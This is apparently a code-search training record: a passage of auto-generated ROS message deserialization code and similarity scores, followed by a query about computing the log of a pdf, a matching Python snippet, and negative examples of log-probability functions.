_x.planning_scene_diff.collision_map.header.stamp.secs, _x.planning_scene_diff.collision_map.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.planning_scene_diff.collision_map.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.planning_scene_diff.collision_map.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.collision_map.boxes = []\n for i in range(0, length):\n val1 = arm_navigation_msgs.msg.OrientedBoundingBox()\n _v110 = val1.center\n _x = _v110\n start = end\n end += 12\n (_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])\n _v111 = 
val1.extents\n _x = _v111\n start = end\n end += 12\n (_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])\n _v112 = val1.axis\n _x = _v112\n start = end\n end += 12\n (_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])\n start = end\n end += 4\n (val1.angle,) = _struct_f.unpack(str[start:end])\n self.planning_scene_diff.collision_map.boxes.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.operations.collision_operations = []\n for i in range(0, length):\n val1 = arm_navigation_msgs.msg.CollisionOperation()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.object1 = str[start:end].decode('utf-8')\n else:\n val1.object1 = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.object2 = str[start:end].decode('utf-8')\n else:\n val1.object2 = str[start:end]\n _x = val1\n start = end\n end += 12\n (_x.penetration_distance, _x.operation,) = _struct_di.unpack(str[start:end])\n self.operations.collision_operations.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.plans is None:\n self.plans = None\n end = 0\n start = end\n end += 1\n (self.error,) = _get_struct_b().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n self.start_pos = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n self.target_pos = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.plans = []\n for i in range(0, length):\n val1 = poppy_torso_control.msg.Trajectory()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.joint = str[start:end].decode('utf-8')\n else:\n val1.joint = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.trajectory = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n self.plans.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.pose is None:\n self.pose = geometry_msgs.msg.PoseWithCovariance()\n end = 0\n _x = self\n start = end\n end += 72\n (_x.detection_id, _x.confidence, _x.pose.pose.position.x, _x.pose.pose.position.y, _x.pose.pose.position.z, _x.pose.pose.orientation.x, _x.pose.pose.orientation.y, _x.pose.pose.orientation.z, _x.pose.pose.orientation.w,) = _get_struct_Q8d().unpack(str[start:end])\n start = end\n end += 288\n self.pose.covariance = _get_struct_36d().unpack(str[start:end])\n _x = self\n start = end\n end += 40\n (_x.height, _x.bbox_x, _x.bbox_y, _x.bbox_w, _x.bbox_h,) = _get_struct_5d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.modality = str[start:end].decode('utf-8')\n else:\n self.modality = str[start:end]\n start = end\n end += 4\n (length,) = 
_struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n self.embed_vector = struct.unpack(pattern, str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.model_aligned is None:\n self.model_aligned = articulation_msgs.msg.ModelMsg()\n if self.data_aligned is None:\n self.data_aligned = articulation_msgs.msg.ModelMsg()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.model_aligned.header.seq, _x.model_aligned.header.stamp.secs, _x.model_aligned.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model_aligned.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.model_aligned.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.model_aligned.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model_aligned.name = str[start:end].decode('utf-8')\n else:\n self.model_aligned.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.params = []\n for i in range(0, length):\n val1 = articulation_msgs.msg.ParamMsg()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _x = val1\n start = end\n end += 9\n (_x.value, _x.type,) = _struct_dB.unpack(str[start:end])\n self.model_aligned.params.append(val1)\n _x = self\n start = end\n end += 12\n (_x.model_aligned.track.header.seq, _x.model_aligned.track.header.stamp.secs, _x.model_aligned.track.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model_aligned.track.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.model_aligned.track.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.model_aligned.track.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v71 = val1.position\n _x = _v71\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v72 = val1.orientation\n _x = _v72\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model_aligned.track.pose.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose_headers = []\n for i in range(0, length):\n val1 = std_msgs.msg.Header()\n start = end\n end += 4\n (val1.seq,) = _struct_I.unpack(str[start:end])\n _v73 = val1.stamp\n _x = _v73\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.frame_id = str[start:end].decode('utf-8')\n else:\n val1.frame_id = str[start:end]\n self.model_aligned.track.pose_headers.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose_projected = []\n for i in range(0, length):\n val1 = 
geometry_msgs.msg.Pose()\n _v74 = val1.position\n _x = _v74\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v75 = val1.orientation\n _x = _v75\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model_aligned.track.pose_projected.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose_resampled = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v76 = val1.position\n _x = _v76\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v77 = val1.orientation\n _x = _v77\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model_aligned.track.pose_resampled.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sI'%length\n start = end\n end += struct.calcsize(pattern)\n self.model_aligned.track.pose_flags = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.channels = []\n for i in range(0, length):\n val1 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.values = struct.unpack(pattern, str[start:end])\n self.model_aligned.track.channels.append(val1)\n _x = self\n start = end\n end += 12\n (_x.data_aligned.header.seq, _x.data_aligned.header.stamp.secs, _x.data_aligned.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data_aligned.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.data_aligned.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.data_aligned.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data_aligned.name = str[start:end].decode('utf-8')\n else:\n self.data_aligned.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.params = []\n for i in range(0, length):\n val1 = articulation_msgs.msg.ParamMsg()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _x = val1\n start = end\n end += 9\n (_x.value, _x.type,) = _struct_dB.unpack(str[start:end])\n self.data_aligned.params.append(val1)\n _x = self\n start = end\n end += 12\n (_x.data_aligned.track.header.seq, _x.data_aligned.track.header.stamp.secs, _x.data_aligned.track.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data_aligned.track.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.data_aligned.track.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.data_aligned.track.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n 
self.data_aligned.track.pose = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v78 = val1.position\n _x = _v78\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v79 = val1.orientation\n _x = _v79\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data_aligned.track.pose.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose_headers = []\n for i in range(0, length):\n val1 = std_msgs.msg.Header()\n start = end\n end += 4\n (val1.seq,) = _struct_I.unpack(str[start:end])\n _v80 = val1.stamp\n _x = _v80\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.frame_id = str[start:end].decode('utf-8')\n else:\n val1.frame_id = str[start:end]\n self.data_aligned.track.pose_headers.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose_projected = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v81 = val1.position\n _x = _v81\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v82 = val1.orientation\n _x = _v82\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data_aligned.track.pose_projected.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose_resampled = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v83 = val1.position\n _x = _v83\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v84 = val1.orientation\n _x = _v84\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data_aligned.track.pose_resampled.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sI'%length\n start = end\n end += struct.calcsize(pattern)\n self.data_aligned.track.pose_flags = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.channels = []\n for i in range(0, length):\n val1 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.values = struct.unpack(pattern, str[start:end])\n self.data_aligned.track.channels.append(val1)\n start = end\n end += 72\n self.R = _struct_9d.unpack(str[start:end])\n start = end\n end += 24\n self.T = _struct_3d.unpack(str[start:end])\n _x = self\n start = end\n end += 12\n (_x.dist_rot, _x.dist_trans,) = _struct_df.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 152\n (_x.tcp, _x.ori, _x.zone, _x.vacuum, _x.workx, _x.worky, _x.workz, _x.workq0, _x.workqx, _x.workqy, _x.workqz, _x.toolx, _x.tooly, _x.toolz, _x.toolq0, _x.toolqx, _x.toolqy, _x.toolqz, _x.ret,) = _struct_2d2q14dq.unpack(str[start:end])\n start = end\n end += 4\n (length,) = 
_struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.msg = str[start:end].decode('utf-8')\n else:\n self.msg = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill" ]
[ "0.8090085", "0.79770607", "0.7917897", "0.7906423", "0.7893816", "0.78317606", "0.78120494", "0.7810609", "0.7784728", "0.77594984", "0.7740543", "0.77159595", "0.77151734", "0.7697443", "0.7693122", "0.768625", "0.76731443", "0.763944", "0.7637318", "0.7629651", "0.7625018", "0.76167494", "0.76013076", "0.75971913", "0.75914437", "0.75859106", "0.75817364", "0.75801873", "0.75619626", "0.75600266", "0.75444394", "0.75368154", "0.7525295", "0.75191957", "0.7517345", "0.7507071", "0.7502871", "0.7499238", "0.7487789", "0.7478959", "0.7476673", "0.74645644", "0.74641854", "0.7441971", "0.74342704", "0.74188226", "0.7416875", "0.7403989", "0.7377319", "0.737021", "0.7368503", "0.7358342", "0.7358342", "0.7358342", "0.73572576", "0.73286086", "0.73131585", "0.7290596", "0.7284919", "0.7283926", "0.72781026", "0.72714263", "0.7270591", "0.72631794", "0.7248612", "0.7244955", "0.72274274", "0.72190243", "0.7216247", "0.7214759", "0.72063154", "0.7202076", "0.7186582", "0.7178574", "0.7165593", "0.7157388", "0.7148532", "0.7144027", "0.7122354", "0.71135867", "0.7077558", "0.70640665", "0.7050577", "0.7027297", "0.70264053", "0.70147157", "0.7011933", "0.68382317", "0.68330246", "0.6831479", "0.6784365", "0.674763", "0.67266095", "0.67159694", "0.67115307", "0.6707256", "0.6696923", "0.6675813", "0.6667689", "0.66539884" ]
0.68092334
90
Compute the log function of the pdf for a fixed value on the support.
def log_pdf_at_x(x): return lambda point: gs.log( self.information_manifold.point_to_pdf(point)(x) )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def logPdf(self,x):\n logPdf = np.log(self.pdf(x))\n return logPdf", "def logPdf(self,x):\n logPdf = np.log(self.pdf(x))\n return logPdf", "def log_pdf(self, x):\n if x < 0:\n raise Exception(\"input value x can't be a negative value!\")\n\n if self.is_fit:\n if x >= 0:\n return -np.log(np.math.factorial(x)) + \\\n x * np.log(self.alpha) - self.alpha\n else:\n return 0\n else:\n raise Exception(\"Distribution doesn't have all parameters set!\")", "def logpdf(self, x):\n if self.transform is not None:\n x = self.transform(x) \n return (-self.alpha-1)*np.log(x) - (self.beta/float(x))", "def log_pdf_derivative(x):\n return gs.autodiff.jacobian(log_pdf_at_x(x))(base_point)", "def logpdf(x, a, b):\n with mp.extradps(5):\n a, b = _validate_a_b(a, b)\n x = mp.mpf(x)\n if x < 0 or x > 1:\n return -mp.inf\n return (_fun.xlogy(a - 1, x) + _fun.xlog1py(b - 1, -x)\n - _fun.logbeta(a, b))", "def _evaluate_point_logpdf(args):\n x, data, cho_factor = args\n\n # Use Cholesky decomposition to avoid direct inversion of covariance matrix\n diff = data - x\n tdiff = la.cho_solve(cho_factor, diff.T, check_finite=False).T\n diff *= tdiff\n\n # Work in the log to avoid large numbers\n return logsumexp(-np.sum(diff, axis=1)/2.0)", "def logpdf(self, X) -> np.ndarray:\n return self.dist.logpdf(self.inv_trans(X))", "def log_pdf_impl(self, alpha, beta, random_variable, F=None):\n F = get_default_MXNet_mode() if F is None else F\n\n g_alpha = F.gammaln(alpha)\n p1 = (alpha - 1.) * F.log(random_variable)\n return (p1 - beta * random_variable) - (g_alpha - alpha * F.log(beta))", "def logpdf(self, point: np.ndarray) -> float:\n point = np.array(point)\n if point.size > 1:\n point = point.reshape((2, -1))\n parts = self._logp.T + np.reshape([rv.logpdf(point) for rv in self._rvs], (2, -1))\n return logsumexp(parts, axis=0)\n parts = self._logp + np.array([rv.logpdf(point) for rv in self._rvs])\n return logsumexp(parts)", "def logpdf(x, p, temperature):\n assert x.shape == p.shape\n tol = 1e-7\n p = np.clip(p, tol, 1 - tol)\n x = np.clip(x, tol, 1 - tol)\n logit_p = logit(p)\n first_term = np.log(temperature) + logit_p - (1 + temperature) * np.log(x) - (1 + temperature) * np.log(1 - x)\n second_term = 2 * np.log((np.exp(logit_p) * (x ** (- temperature))) + (1 - x) ** (- temperature))\n return first_term - second_term", "def conditional_logpdf(self, x1, x2 = None):\n f_x2 = self.unconditional_pdf_x2(x2)\n return self.joint_logpdf(x1, x2) - np.log(f_x2)", "def log_pdf(X, parameters):\n check_data_type_column_data(X)\n check_model_params_dict(parameters)\n\n sigma = (1.0/parameters['rho'])**.5\n\n return norm.logpdf(X,parameters['mu'],sigma)", "def logpdf(self, f, y, extra_data=None):\r\n link_f = self.gp_link.transf(f)\r\n return self.logpdf_link(link_f, y, extra_data=extra_data)", "def logpdf(self, X) -> np.ndarray:\n raise NotImplementedError", "def pdf(self, x, log = False):\n if log:\n return D.logsumexp(\n D.multiple_gauss_den(x, self.mu, self.va, log = True)\n + N.log(self.w))\n else:\n return N.sum(D.multiple_gauss_den(x, self.mu, self.va) * self.w, 1)", "def log_pdf_impl(self, mean, variance, random_variable, F=None):\n F = get_default_MXNet_mode() if F is None else F\n\n alpha, beta = self._get_alpha_beta(mean, variance)\n g_alpha = F.gammaln(alpha)\n p1 = (alpha - 1.) 
* F.log(random_variable)\n return (p1 - beta * random_variable) - (g_alpha - alpha * F.log(beta))", "def get_log(p):\n if p==0:\n return 0.\n return p*np.log2(p)", "def log_pdf_derivative_squared(x):\n dlog = log_pdf_derivative(x)\n return gs.einsum(\"...i, ...j -> ...ij\", dlog, dlog)", "def log_likelihood_function(self, instance) -> float:\n return self.prior.factor(instance[0])", "def logFactorial(value):\n if all([value > 0,abs(round(value) - value) < 0.000001,value <= 34]):\n return float(sum(np.log(range(1,int(value) + 1))))\n elif all([value > 0,abs(round(value) - value) < 0.000001,value > 34]):\n return float(value)*np.log(float(value)) - float(value) + \\\n 0.5*np.log(2.0*np.pi*float(value)) - 1.0/(12.0*float(value))\n elif value == 0:\n return float(0)\n else:\n return float('nan')", "def pdf(self,x):\n if self.base == 'natural':\n pdfValue = 1./(self.upperBound-self.lowerBound) * 1./x\n else:\n pdfValue = 1./(self.upperBound-self.lowerBound) * 1./x * 1./math.log(10.)\n return pdfValue", "def log_marg_like(self, gamma, gamma0, lamb, nu):\n return self.ppi_distribution(gamma, gamma0, lamb).logpdf(self.Y, precision_multiplier=nu)", "def logpdf(self, X) -> np.ndarray:\n if not isinstance(X, np.ndarray):\n X = np.array(X)\n H = 0.5 * ((X - self.means) / self.scales) ** 2\n Z = sqrt(2 * pi) * self.scales\n return -np.sum(H + np.log(Z), axis=1)", "def logistic_log_pdf(x: JaxArray, mean: JaxArray, scale: JaxArray) -> JaxArray:\n\n # change of variables\n z = (x - mean) / scale\n\n # log probability\n # log_prob = z - np.log(scale) - 2 * jax.nn.softplus(z)\n # log_prob = jax.scipy.stats.logistic.logpdf(z)\n log_prob = z - np.log(scale) - 2 * softplus(z)\n\n return log_prob", "def logpdf(self, f, y, Y_metadata=None):\n if isinstance(self.gp_link, link_functions.Identity):\n return self.logpdf_link(f, y, Y_metadata=Y_metadata)\n else:\n inv_link_f = self.gp_link.transf(f)\n return self.logpdf_link(inv_link_f, y, Y_metadata=Y_metadata)", "def log_likelihood(self):\n\n if self._log_likelihood is None:\n self._log_likelihood = logpdf(x=self.y, cov=self.S)\n return self._log_likelihood", "def calc_F(self, peq):\n return self.dmat_d_.dot(np.log(peq))", "def log_prob(self):", "def logpdf(self, x, norm=False):\n raise NotImplementedError(\"Normalized logposterior not implemented\")", "def all_logpdf(x, shape_par):\n return stat.logpdf(x, *shape_par)", "def logp(self, F, Y):\n raise NotImplementedError(\"implement the logp function\\\n for this likelihood\")", "def logpdf_link(self, link_f, y, Y_metadata=None):\n log_objective = np.log(link_f) - y*link_f\n return log_objective", "def invwish_logpdf(X, S, df):\n d = X.shape[0]\n if df < d:\n raise ValueError('df must be greater than or equal to the number of '\n ' dimensions of S')\n if d != X.shape[1]:\n raise ValueError('X must be square.')\n if S.shape[0] != d or S.shape[1] != d:\n raise ValueError('S must be the same shape as X.')\n\n _, logdet_S = slogdet(S)\n _, logdet_X = slogdet(X)\n\n logpdf = (df/2)*logdet_S - ((df*d/2)*log(2) + multigammaln(df/2, d))\n logpdf += (-(d+df+1)/2)*logdet_X - (1/2)*trace(solve(X.T, S.T))\n\n return logpdf", "def M(f):\n return 1127 * numpy.log(1 + f/700.0)", "def log_norm_pdf(x, sigma):\n _, det_sigma = np.linalg.slogdet(sigma)\n return -0.5*np.dot(x.T, np.linalg.solve(sigma,x))[0,0] - np.log(2*np.pi) - det_sigma", "def logpdf_link(self, link_f, y, extra_data=None):\r\n assert np.asarray(link_f).shape == np.asarray(y).shape\r\n return -0.5*(np.sum((y-link_f)**2/self.variance) + self.ln_det_K + 
self.N*np.log(2.*np.pi))", "def conditional_pdf(self, x1, x2 = None):\n return np.exp(self.conditional_logpdf(x1, x2))", "def log_like_gamma(params, n):\n alpha, beta = params\n\n # limits:\n # alpha > 0\n # beta > 0\n if alpha <= 0 or beta <= 0:\n return -np.inf\n\n return np.sum(st.gamma.logpdf(n, alpha, scale=1/beta))", "def log(x, base=math.e):\n return 0.0", "def logpdf(self, x, mean, cov):\r\n dim, mean, cov = _process_parameters(None, mean, cov)\r\n x = _process_quantiles(x, dim)\r\n prec_U, log_det_cov = _psd_pinv_decomposed_log_pdet(cov)\r\n out = self._logpdf(x, mean, prec_U, log_det_cov)\r\n return _squeeze_output(out)", "def logpdf_link(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n log_objective = np.log(link_f) - y*link_f\r\n #logpdf_link = np.sum(-np.log(link_f) - y/link_f)\r\n return np.sum(log_objective)", "def weight_log(val):\n return val * math.log(val)", "def my_log(num):\n\n if num == 0.0:\n return -9999999999\n return math.log(num)", "def _loglike(self, y, f):\n ll = -0.5 * (tf.log(2 * self.variance * np.pi) +\n (y - f)**2 / self.variance)\n return ll", "def logpdf(self, X) -> np.ndarray:\n comp_logpdfs = [np.reshape(comp.logpdf(X), [-1, 1]) for comp in self.components]\n logpdfs = np.hstack(comp_logpdfs)\n result = logsumexp(logpdfs, axis=1, b=self.coefficients)\n return np.array(result)", "def mpf_log(x, prec, rnd=round_fast):\n sign, man, exp, bc = x\n #------------------------------------------------------------------\n # Handle special values\n if not man:\n if x == fzero: return fninf\n if x == finf: return finf\n if x == fnan: return fnan\n if sign:\n raise ComplexResult(\"logarithm of a negative number\")\n wp = prec + 20\n #------------------------------------------------------------------\n # Handle log(2^n) = log(n)*2.\n # Here we catch the only possible exact value, log(1) = 0\n if man == 1:\n if not exp:\n return fzero\n return from_man_exp(exp*ln2_fixed(wp), -wp, prec, rnd)\n mag = exp+bc\n abs_mag = abs(mag)\n #------------------------------------------------------------------\n # Handle x = 1+eps, where log(x) ~ x. We need to check for\n # cancellation when moving to fixed-point math and compensate\n # by increasing the precision. 
Note that abs_mag in (0, 1) <=>\n # 0.5 < x < 2 and x != 1\n if abs_mag <= 1:\n # Calculate t = x-1 to measure distance from 1 in bits\n tsign = 1-abs_mag\n if tsign:\n tman = (MPZ_ONE<<bc) - man\n else:\n tman = man - (MPZ_ONE<<(bc-1))\n tbc = bitcount(tman)\n cancellation = bc - tbc\n if cancellation > wp:\n t = normalize(tsign, tman, abs_mag-bc, tbc, tbc, 'n')\n return mpf_perturb(t, tsign, prec, rnd)\n else:\n wp += cancellation\n # TODO: if close enough to 1, we could use Taylor series\n # even in the AGM precision range, since the Taylor series\n # converges rapidly\n #------------------------------------------------------------------\n # Another special case:\n # n*log(2) is a good enough approximation\n if abs_mag > 10000:\n if bitcount(abs_mag) > wp:\n return from_man_exp(exp*ln2_fixed(wp), -wp, prec, rnd)\n #------------------------------------------------------------------\n # General case.\n # Perform argument reduction using log(x) = log(x*2^n) - n*log(2):\n # If we are in the Taylor precision range, choose magnitude 0 or 1.\n # If we are in the AGM precision range, choose magnitude -m for\n # some large m; benchmarking on one machine showed m = prec/20 to be\n # optimal between 1000 and 100,000 digits.\n if wp <= LOG_TAYLOR_PREC:\n m = log_taylor_cached(lshift(man, wp-bc), wp)\n if mag:\n m += mag*ln2_fixed(wp)\n else:\n optimal_mag = -wp//LOG_AGM_MAG_PREC_RATIO\n n = optimal_mag - mag\n x = mpf_shift(x, n)\n wp += (-optimal_mag)\n m = -log_agm(to_fixed(x, wp), wp)\n m -= n*ln2_fixed(wp)\n return from_man_exp(m, -wp, prec, rnd)", "def smart_log(self, value: float) -> float:\n if value > 0:\n return math.log(value, self.log_scale)\n elif value == 0:\n return 0\n elif value < 0:\n return -(math.log(abs(value), self.log_scale))", "def logpdf_link(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n return np.sum(-link_f + y*np.log(link_f) - special.gammaln(y+1))", "def make_ln_func(variable):\n def safe_ln_queryset(qs):\n \"\"\"Takes the natural log of a queryset's values and handles zeros\"\"\"\n vals = qs.values_list(variable, flat=True)\n ret = np.log(vals)\n ret[ret == -np.inf] = 0\n return ret\n return safe_ln_queryset", "def compute_log_prior(self,params: ndarray) -> float:\n ln_tE = params[0]\n ln_A0 = params[1]\n ln_deltaT = params[2]\n fbl = params[3]\n mb = params[4]\n\n # Equation (16,15,17) (note that Albrow uses \"log\" for log10)\n log10e = np.log10(np.exp(1))\n ln_pr_ln_tE = np.log(0.476) - ((log10e*ln_tE - 1.333)**2 / 0.330) + np.log(log10e)\n ln_pr_ln_A0 = np.log(0.660) - (1.289*log10e*ln_A0) + np.log(log10e)\n ln_pr_ln_deltaT = np.log(0.156) - ((log10e*ln_deltaT - 1.432)**2 / 0.458) +\\\n np.log(log10e)\n \n # Paper doesnt mention the prior used, but I assume it to be uniform\n ln_pr_fbl = uniform.logpdf(fbl,0.0,1.0)\n\n # Paper doesnr mention the prior used but I will asuumed it to be uniform\n ln_pr_mb = uniform.logpdf(mb,self.mag_min - 1.0, self.mag_max + 1.0)\n \n \n return ln_pr_fbl + ln_pr_ln_A0 + ln_pr_ln_deltaT + ln_pr_ln_tE + ln_pr_mb", "def log(self, base):\n\n\t\tvalues = map(lambda x: x > 0, self.val)\n\t\tif not all(values):\n\t\t\traise ValueError(\"Non-positive number encountered in log.\")\n\t\telse:\n\t\t\tval = np.array([np.math.log(v, base) for v in self.val])\n\t\t\tif len(self.der.shape):\n\t\t\t\tto_multiply = 1 / np.multiply(np.log(base), self.val)\n\t\t\t\tto_multiply = np.expand_dims(to_multiply, 1) if len(self.der.shape) > len(to_multiply.shape) else to_multiply\n\t\t\t\tder = 
